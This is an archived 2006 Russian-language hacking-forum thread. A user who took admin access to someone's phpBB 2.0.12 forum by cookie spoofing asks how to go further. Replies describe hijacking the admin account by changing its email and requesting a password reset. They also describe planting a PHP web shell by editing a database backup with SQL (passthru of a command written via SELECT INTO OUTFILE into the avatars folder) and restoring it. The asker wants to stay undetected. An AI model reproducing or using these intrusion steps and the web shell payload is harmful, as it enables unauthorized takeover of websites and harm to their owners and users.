Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Способы заливки шелла в phpBB 2.0.12 (https://forum.antichat.xyz/showthread.php?t=20392)

DimaHbl4 10.06.2006 23:43

Способы заливки шелла в phpBB 2.0.12
 
Получил права админа подменой кукисов, и че дальше сделать? База не сливается, не одна известная иньекция не помогает которые я пробывал, ни один сплойт с удаленными командами не работает. Люди скажите хотя бы как мне получить хеш админа? Или посоветуйте какой-нить сплойт? А может можно какими-то обходными путями залить шелл?

Ch3ck 10.06.2006 23:48

Может, чуть-чуть подробнее ситуацию опишешь, какой форум... и т.д...

DimaHbl4 10.06.2006 23:57

phpbb 2.0.12, че еще подробнее? Именно?

c411k 11.06.2006 00:03

хы, если кукисы=пасс от админки в мд5, то еще что-то сделать можно. но похоже это не так, т.е тебе нужно достать настоящий пасс.. мде, почему то именно сейчас в голову пришла неплохая мысль.. :p берешь в профайле меняешь мыло админа на свое, и ретривишь пароль на то мыло, которое указал.. ы черт, чтож я раньше не допер :D мыло админа только не забудь записать, чтоб обратно поменять.. жаль что пасс обратно нельзя будет поставить (например, если ипб, то с помощью бд хоть и сам хеш вставишь, а соль фигушки)..

Ch3ck 11.06.2006 00:05

нет...погоди...так, а ты непробовал шелл залить или "сделать его"... ну типа в админке есть меню, я уж не помню, типа сохранить БД, вот сохраняешь её... открываешь блокнотом, или лучше Bredo'm и исчешь вот это:
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', 'test', '10');
Если нашёл, то заменяешь вот на это...
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? passthru("$cmd"); ?>', '10');
SELECT cat_title INTO OUTFILE '/home/test2.ru/www/phpbb/images/avatars/shell.php' FROM phpbb_categories where cat_id=1;
UPDATE phpbb_categories SET cat_title='test'WHERE cat_id=1;
А потом из этого же меню в админке востанавливаешь БД и указываешь путь к только, что исправленной БД.
Этот путь которой указан выше, от случая к случаю...
там будет осоздан обычный шелл...а там обращаешь с нему с просьбой выпонить тебе команду....вот и всё...

DimaHbl4 11.06.2006 00:07

c411k А ты уверен что он мне его пасс вышлет? Я так уже думал, если он новый сгенерирует, то че делать? Впалюсь.

DimaHbl4 11.06.2006 00:08

Dr.Check Я же написал что базу слить не могу....

c411k 11.06.2006 00:11

Цитата:

Сообщение от DimaHbl4
c411k А ты уверен что он мне его пасс вышлет? Я так уже думал, если он новый сгенерирует, то че делать? Впалюсь.

ну так новый сгенерит и пох. зато будет админка. ты потом вбей какой нибудь default pass вбей, но мыло ему обратно смени, чтоб мог се восстановить. ну я ж писал что палево, зато работает ))

DimaHbl4 11.06.2006 00:14

c411k А мне палево не надо, тогда он везде пасс сменить, и шеллы начнет искать, и баста карапузики ;) Все нужно делать тихо.....

Ch3ck 11.06.2006 00:14

и загрузить тоже не чего нельзя чтоль?


Время: 19:58